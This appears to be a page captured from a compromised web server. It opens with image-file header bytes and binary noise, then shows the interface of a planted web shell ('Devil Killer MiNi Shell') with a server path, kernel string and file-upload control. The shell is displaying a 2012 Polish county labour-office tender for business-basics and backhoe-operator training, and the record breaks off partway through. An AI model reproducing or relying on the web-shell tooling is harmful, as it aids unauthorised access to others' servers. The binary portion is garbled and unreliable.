JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120511/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120511/151506-N-2012.html

<p class="kh_header"><b>Świecie: Na przeprowadzenie szkolenia zawodowego wg części</b><br>
<b>Numer ogłoszenia: 151506 - 2012; data zamieszczenia: 11.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki - Powiatowy Urząd Pracy w Świeciu , ul. Wojska Polskiego 195a, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 33 32 210, faks 52 33 32 253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pup.swiecie.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na przeprowadzenie szkolenia zawodowego wg części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych.
1.	Program szkolenia
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych 
w dwóch grupach pięcioosobowych. Szkolenie każdej z grup ma być przeprowadzone tylko dla uczestników szkolenia skierowanych przez Zamawiającego.
a.	Nazwa szkolenia: ABC biznesu.
b.	Zakres szkolenia
Program szkolenia dla każdej z grup musi obejmować następujące zagadnienia:
a)	opracowanie biznes planu (12 godzin edukacyjnych - 2 godziny teorii, 10 godzin praktyki),
b)	rodzaje sposobów rozliczania z Urzędem Skarbowym, dokumenty wynikające ze sposobów rozliczania (12 godzin edukacyjnych - 4 godziny teorii, 8 godzin praktyki),
c)	rozliczenia z Zakładem Ubezpieczeń Społecznych, dokumenty rozliczeń (7 godzin edukacyjnych - 2 godziny teorii, 5 godzin praktyki),
d)	prawo pracy  (5 godzin edukacyjnych - 5 godzin teorii),
e)	zasady i dokumenty dotyczące rejestracji działalności gospodarczej (3 godziny edukacyjne - 2 godziny teorii, 1 godzina praktyki),
f)	egzamin wewnętrzny (1 godzina edukacyjna -1 godzina praktyki).
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 40 godzin zajęć edukacyjnych dla każdej z grup.
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.

Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania     zawierającym: tematy zajęć edukacyjnych oraz treści szkolenia w zakresie poszczególnych zajęć edukacyjnych. (Załącznik nr 1 do SIWZ punkt II podpunkt 5).
Szkolenie ma być realizowane od poniedziałku do piątku w kolejno następujących po sobie dniach roboczych (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 16.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godzin edukacyjnych. 
Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godzin zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej 
w miejsce osoby, która przerwała szkolenie w przypadku gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie zaświadczenia.
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne
 i piśmiennicze) tj. skrypt obejmujący zagadnienia merytoryczne programu szkolenia i długopis oraz aktualne druki dotyczące rejestracji działalności gospodarczej i rozliczeń z US i ZUS (Załącznik nr 1 do SIWZ punkt II podpunkt 7a). 
Każdy uczestnik w pierwszym dniu szkolenia musi otrzymać powyższe materiały szkoleniowe oraz pisemnie potwierdzić ich odbiór.
Wykonawca będzie dysponować wyposażeniem dydaktycznym, urządzeniami do wizualizacji prezentowanych zagadnień szkolenia minimum rzutnikiem multimedialnym, ekranem i tablicą flipchart (Załącznik nr 1 do SIWZ punkt II podpunkt 7b).
Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu każdej grupy Wykonawca musi przeprowadzić egzamin wewnętrzny. (Załącznik nr 1 do SIWZ punkt II podpunkt 8).
(Koszt egzaminu wewnętrznego należy ująć w Kosztach szkolenia). 
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
Wykonawca będzie dysponował wykwalifikowaną kadrą dydaktyczną. Każdy z wykładowców będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011.
Zajęcia musi(-szą) prowadzić osoba(-y):
a)	moduł opracowanie biznesplanu osoba(-y) z wykształceniem wyższym, mająca(-e) doświadczenie w przygotowaniu minimum 2 biznes planów, które zostały wdrożone,
b)	rozliczenia z Urzędem Skarbowym osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z US minimum 2 letnim w latach 2009 - 2011,
c)	moduł rozliczenia z Zakładem Ubezpieczeń Społecznych osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z ZUS minimum 2 letnim w latach 2009 - 2011,
d)	moduł prawo pracy oraz zasady  i dokumenty dotyczące rejestracji działalności gospodarczej radca prawny z doświadczeniem  zawodowym minimum rocznym. 
(Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 osobowego o tej samej tematyce w latach  2009 - 2011 roku (Załącznik nr 1 do SIWZ punkt IV).
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne z § 75 ust 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U.10.177.1193 z późn. zm.).
5.	Miejsce szkolenia (Załącznik nr 1 do SIWZ punkt VI).
Preferowane Świecie. 
6.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	Wykonawca zapewni uczestnikom szkolenia zakwaterowanie oraz całodobowe wyżywienie (śniadanie, obiad, kolacja) w przypadku: gdy łączny czas przejazdu z miejsca zamieszkania do miejsca odbywania szkolenia i powrotu wyniesie ponad 3 godziny lub organizacji szkolenia poza miejscowością Świecie przy jednoczesnym braku połączeń środkami komunikacji publicznej w godzinach umożliwiających odbycie szkolenia. Obiady mają składać się z minimum dania głównego podczas którego należy zapewnić również wodę i/lub sok.
O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Podczas przerw kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę. W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. 
W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest to koszt warunkowy). 
b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących osobami bezrobotnymi od dnia podjęcia przez nich zatrudnienia, innej pracy zarobkowej lub podjęcia działalności gospodarczej w trakcie szkolenia (art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy Dz. U.08.69.415 z późn. zm.). 
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących poszukującymi pracy, o których mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje prawo do stypendium, zgodnie z art. 41 ust. 7 i 8 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika(-ów) szkolenia, powstałych w związku z odbywaniem szkolenia oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony na wniosek Zamawiającego i udokumentowany przez Wykonawcę. 
Informacja o konieczności ubezpieczenia uczestnika(-ów) szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
(Koszt ubezpieczenia ujęty w Kosztach szkolenia jest kosztem warunkowym).
7.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety anonimowej stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego) (Załącznik nr 4a do SIWZ).


Część II

1.	Program szkolenia
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych w jednej grupie. Szkolenie ma być przeprowadzone tylko dla uczestników szkolenia skierowanych przez Zamawiającego. 
a.	Nazwa szkolenia: Operator koparko-ładowarki.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia 202 godziny zajęć, w tym:
116	godzin teoretycznych,
86 godzin praktycznych,
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania      zawierającym: tematy zajęć edukacyjnych oraz opis treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania zawierającym: tematy zajęć edukacyjnych oraz treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych. (Załącznik nr 1 do SIWZ punkt II podpunkt 5).
Szkolenie ma być realizowane od poniedziałku do piątku w kolejno następujących po sobie dniach roboczych (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 18.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godzin edukacyjnych. 
Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godzin zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej w miejsce osoby, która przerwała szkolenie w przypadku gdy pozostała ilość godzin szkolenia umożliwi ukończenie go i zdobycie uprawnień.
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne 
i piśmiennicze) tj. skrypt obejmujący merytoryczne zagadnienia programu szkolenia i długopis (każdy uczestnik w pierwszym dniu szkolenia musi otrzymać powyższe materiały szkoleniowe oraz pisemnie potwierdzić ich odbiór). 
Wykonawca do realizacji zajęć teoretycznych szkolenia będzie dysponował wyposażeniem dydaktycznym, urządzeniami do wizualizacji prezentowanych zagadnień szkolenia minimum rzutnikiem multimedialnym, ekranem i tablicą flipchart (Załącznik nr 1 do SIWZ punkt II podpunkt 7a). 
Wykonawca do realizacji zajęć praktycznych szkolenia będzie dysponował sprzętem: minimum 2 koparko-ładowarkami.
(Załącznik nr 1 do SIWZ punkt II podpunkt 7b).
 Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu Wykonawca musi dokonać zapłaty za pierwszy egzamin końcowy przed Komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie 
i pisemnie poinformować Zamawiającego o wyznaczonym terminie ww. egzaminu. (Załącznik nr 1 do SIWZ punkt II podpunkt 8).
(Koszt egzaminu państwowego należy ująć w Kosztach szkolenia). 
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
Wykonawca będzie dysponował wykwalifikowaną kadrą dydaktyczną wykładowcy(-ów) 
i instruktora(-ów). Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego dziesięcioosobowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011 (Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 - osobowego o tej samej tematyce w latach  2009 - 2011 roku (Załącznik nr 1 do SIWZ punkt IV).
Wykonawca będzie dysponować na czas realizacji szkolenia pozwoleniami Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na przeprowadzanie szkoleń w zakresie operatorów maszyn do robót ziemnych, budowlanych i drogowych.
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
a.	Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne 
 z § 75 ust 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U.10.177.1193 z późn. zm.).
b.	Każdy uczestnik szkolenia, który zda egzamin końcowy musi otrzymać książkę operatora wydaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalanego oraz świadectwo zgodnie 
z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa 
i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263). Dla osób, które posiadają już książkę operatora należy dokonać w niej wpisu nadającego odpowiednie  uprawnienia.
c.	Wykonawca jest zobowiązany po zakończeniu egzaminu państwowego i otrzymaniu uprawnień dostarczyć Zamawiającemu oryginał książki operatora oraz pisemną informację o uczestnikach, którzy nie stawili się na egzaminie lub go nie zdali. 
5.	Miejsce szkolenia (Załącznik nr 1 do SIWZ punkt VI).
Preferowane Świecie. 
6.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	Wykonawca zapewni uczestnikom szkolenia zakwaterowanie oraz całodobowe wyżywienie (śniadanie, obiad, kolacja) w przypadku: gdy łączny czas przejazdu z miejsca zamieszkania do miejsca odbywania szkolenia i powrotu wyniesie ponad 3 godziny lub organizacji szkolenia poza miejscowością Świecie przy jednoczesnym braku połączeń środkami komunikacji publicznej 
w godzinach umożliwiających odbycie szkolenia. Obiady mają składać się z minimum dania głównego podczas którego należy zapewnić również wodę i/lub sok.
O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Podczas przerw kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę. 
W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. 
W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest to koszt warunkowy). 
b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących osobami bezrobotnymi od dnia podjęcia przez nich zatrudnienia, innej pracy zarobkowej lub podjęcia działalności gospodarczej w trakcie szkolenia (art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy Dz. U.08.69.415 z późn. zm.). 
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących poszukującymi pracy, o których mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje prawo do stypendium, zgodnie z art. 41 ust. 7 i 8 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika(-ów) szkolenia, powstałych w związku z odbywaniem szkolenia oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony na wniosek Zamawiającego i udokumentowany przez Wykonawcę. 
Informacja o konieczności ubezpieczenia uczestnika(-ów) szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
(Koszt ubezpieczenia ujęty w Kosztach szkolenia jest kosztem warunkowym).
c.	Koszty badań lekarskich uczestników szkolenia pokrywa Zamawiający.
d.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety anonimowej stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego) (Załącznik nr 4a do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 05.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.
Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania uprawnień do wykonywania  określonej działalności i czynności, jeżeli ten oświadczy, że posiada wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.
Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia, jeżeli ten wykaże, że posiada doświadczenie w realizacji szkoleń o tej samej tematyce:
dla części I przetargu: 
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 osobowego o tej samej tematyce w latach  2009 - 2011 roku, 
dla części II przetargu: 
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego minimum 10 - osobowego o tej samej tematyce w latach  2009 - 2011 roku,
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.
Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym  jeżeli ten wykaże, że:
będzie dysponował potencjałem technicznym zdolnym do prawidłowego wykonania przedmiotu zamówienia, tj.:
dla części I przetargu: minimum jednym rzutnikiem multimedialnym, jednym ekranem i jedną  tablicą flipchart,
dla części II przetargu: minimum 2 koparko-ładowarkami,
(Załącznik nr 1 do SIWZ punkt II podpunkt 8b).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania  osobami zdolnymi do wykonania zamówienia jeżeli ten wykaże, że:
będzie dysponował odpowiednim potencjałem kadrowym - osobami zdolnymi do prawidłowego wykonania zamówienia, tj.:
dla części I przetargu: 
Każdy z wykładowców będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011.
Zajęcia musi(-szą) prowadzić osoba(-y):
a)	moduł opracowanie biznesplanu osoba(-y) z wykształceniem wyższym, mająca(-e) doświadczenie w przygotowaniu minimum 2 biznes planów, które zostały wdrożone,
b)	rozliczenia z Urzędem Skarbowym osoba(-y) z wykształceniem wyższym oraz doświadczeniem zawodowym w rozliczeniach działalności gospodarczej z US minimum 2 letnim w latach 2009 - 2011,
